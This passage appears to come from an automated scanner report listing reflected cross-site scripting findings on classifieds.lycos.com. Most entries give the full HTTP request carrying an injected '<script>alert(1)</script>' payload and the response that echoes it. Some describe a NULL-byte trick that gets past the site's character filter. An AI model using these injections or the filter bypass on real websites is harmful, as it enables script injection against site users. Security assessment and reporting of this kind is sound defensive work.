The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 81eda"><script>alert(1)</script>7114e62b448 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /housing-sale-vacation81eda"><script>alert(1)</script>7114e62b448/ HTTP/1.1 Host: classifieds.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;
Response
HTTP/1.1 404 Not Found Date: Mon, 07 Feb 2011 15:51:35 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:51:35 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 17718
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="/housing-sale-vacation81eda"><script>alert(1)</script>7114e62b448/?mobile=1" rel="nofollow"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 430ae"><script>alert(1)</script>1f3a5663ade was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /housing-sale-vacation430ae"><script>alert(1)</script>1f3a5663ade/ HTTP/1.1 Host: classifieds.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;
Response
HTTP/1.1 404 Not Found Date: Mon, 07 Feb 2011 15:15:38 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:15:38 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 17718
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="/housing-sale-vacation430ae"><script>alert(1)</script>1f3a5663ade/?mobile=1" rel="nofollow"> ...[SNIP]...
1.65. http://classifieds.lycos.com/housing-sale-vacation/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://classifieds.lycos.com
Path:
/housing-sale-vacation/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a23ee"><script>alert(1)</script>c8f63f04749 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /housing-sale-vacation/?a23ee"><script>alert(1)</script>c8f63f04749=1 HTTP/1.1 Host: classifieds.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;
Response
HTTP/1.1 200 OK Date: Mon, 07 Feb 2011 15:14:55 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:14:55 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 61008
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="/housing-sale-vacation/?a23ee"><script>alert(1)</script>c8f63f04749=1&mobile=1" rel="nofollow"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 614c4"><script>alert(1)</script>eedf9505edd was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /housing-sale614c4"><script>alert(1)</script>eedf9505edd/ HTTP/1.1 Host: classifieds.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;
Response
HTTP/1.1 404 Not Found Date: Mon, 07 Feb 2011 15:00:22 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:00:22 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 17691
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="/housing-sale614c4"><script>alert(1)</script>eedf9505edd/?mobile=1" rel="nofollow"> ...[SNIP]...
1.67. http://classifieds.lycos.com/housing-sale/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://classifieds.lycos.com
Path:
/housing-sale/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c6bb2"><script>alert(1)</script>fe77791765c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /housing-sale/?c6bb2"><script>alert(1)</script>fe77791765c=1 HTTP/1.1 Host: classifieds.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;
Response
HTTP/1.1 200 OK Date: Mon, 07 Feb 2011 14:59:37 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 14:59:37 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 66144
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="/housing-sale/?c6bb2"><script>alert(1)</script>fe77791765c=1&mobile=1" rel="nofollow"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 32400"><script>alert(1)</script>ad6e471f8c3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /job-admin32400"><script>alert(1)</script>ad6e471f8c3/ HTTP/1.1 Host: classifieds.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;
Response
HTTP/1.1 404 Not Found Date: Mon, 07 Feb 2011 15:11:47 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:11:47 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 17682
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="/job-admin32400"><script>alert(1)</script>ad6e471f8c3/?mobile=1" rel="nofollow"> ...[SNIP]...
1.69. http://classifieds.lycos.com/job-admin/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://classifieds.lycos.com
Path:
/job-admin/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a5521"><script>alert(1)</script>af69a726549 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /job-admin/?a5521"><script>alert(1)</script>af69a726549=1 HTTP/1.1 Host: classifieds.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;
Response
HTTP/1.1 200 OK Date: Mon, 07 Feb 2011 15:11:02 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:11:02 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 53726
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="/job-admin/?a5521"><script>alert(1)</script>af69a726549=1&mobile=1" rel="nofollow"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c8e88"><script>alert(1)</script>8045ffbcb07 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /job-advertisingc8e88"><script>alert(1)</script>8045ffbcb07/ HTTP/1.1 Host: classifieds.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;
Response
HTTP/1.1 404 Not Found Date: Mon, 07 Feb 2011 15:11:33 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:11:33 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 17700
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="/job-advertisingc8e88"><script>alert(1)</script>8045ffbcb07/?mobile=1" rel="nofollow"> ...[SNIP]...
1.71. http://classifieds.lycos.com/job-advertising/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://classifieds.lycos.com
Path:
/job-advertising/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fde33"><script>alert(1)</script>b78103d674b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /job-advertising/?fde33"><script>alert(1)</script>b78103d674b=1 HTTP/1.1 Host: classifieds.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;
Response
HTTP/1.1 200 OK Date: Mon, 07 Feb 2011 15:10:42 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:10:42 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 57353
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="/job-advertising/?fde33"><script>alert(1)</script>b78103d674b=1&mobile=1" rel="nofollow"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b4e44"><script>alert(1)</script>48af843abc was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /job-customer_serviceb4e44"><script>alert(1)</script>48af843abc/ HTTP/1.1 Host: classifieds.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;
Response
HTTP/1.1 404 Not Found Date: Mon, 07 Feb 2011 15:12:16 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:12:16 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 17712
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="/job-customer_serviceb4e44"><script>alert(1)</script>48af843abc/?mobile=1" rel="nofollow"> ...[SNIP]...
1.73. http://classifieds.lycos.com/job-customer_service/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://classifieds.lycos.com
Path:
/job-customer_service/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8344e"><script>alert(1)</script>c46db3618e6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /job-customer_service/?8344e"><script>alert(1)</script>c46db3618e6=1 HTTP/1.1 Host: classifieds.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;
Response
HTTP/1.1 200 OK Date: Mon, 07 Feb 2011 15:11:40 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:11:40 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 57473
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="/job-customer_service/?8344e"><script>alert(1)</script>c46db3618e6=1&mobile=1" rel="nofollow"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a155a"><script>alert(1)</script>d3bf9ba5c9c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /job-financea155a"><script>alert(1)</script>d3bf9ba5c9c/ HTTP/1.1 Host: classifieds.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;
Response
HTTP/1.1 404 Not Found Date: Mon, 07 Feb 2011 15:11:47 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:11:47 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 17688
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="/job-financea155a"><script>alert(1)</script>d3bf9ba5c9c/?mobile=1" rel="nofollow"> ...[SNIP]...
1.75. http://classifieds.lycos.com/job-finance/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://classifieds.lycos.com
Path:
/job-finance/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ddf33"><script>alert(1)</script>ba87cf83b94 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /job-finance/?ddf33"><script>alert(1)</script>ba87cf83b94=1 HTTP/1.1 Host: classifieds.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;
Response
HTTP/1.1 200 OK Date: Mon, 07 Feb 2011 15:10:52 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:10:52 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 56619
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="/job-finance/?ddf33"><script>alert(1)</script>ba87cf83b94=1&mobile=1" rel="nofollow"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8bc6e"><script>alert(1)</script>b4026032be9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /job-nonprofit8bc6e"><script>alert(1)</script>b4026032be9/ HTTP/1.1 Host: classifieds.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;
Response
HTTP/1.1 404 Not Found Date: Mon, 07 Feb 2011 15:12:20 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:12:20 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 17694
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="/job-nonprofit8bc6e"><script>alert(1)</script>b4026032be9/?mobile=1" rel="nofollow"> ...[SNIP]...
1.77. http://classifieds.lycos.com/job-nonprofit/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://classifieds.lycos.com
Path:
/job-nonprofit/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a9fb2"><script>alert(1)</script>0ee80b17dde was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /job-nonprofit/?a9fb2"><script>alert(1)</script>0ee80b17dde=1 HTTP/1.1 Host: classifieds.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;
Response
HTTP/1.1 200 OK Date: Mon, 07 Feb 2011 15:11:53 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:11:53 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 49474
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="/job-nonprofit/?a9fb2"><script>alert(1)</script>0ee80b17dde=1&mobile=1" rel="nofollow"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %009cbe7"><script>alert(1)</script>db333101482 was submitted in the REST URL parameter 1. This input was echoed as 9cbe7"><script>alert(1)</script>db333101482 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /job-retail%009cbe7"><script>alert(1)</script>db333101482/ HTTP/1.1 Host: classifieds.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;
Response
HTTP/1.1 404 Not Found Date: Mon, 07 Feb 2011 15:12:28 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:12:28 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 25659
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="/job-retail%009cbe7"><script>alert(1)</script>db333101482/?mobile=1" rel="nofollow"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5f5b3"><script>alert(1)</script>ea30b774ac5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
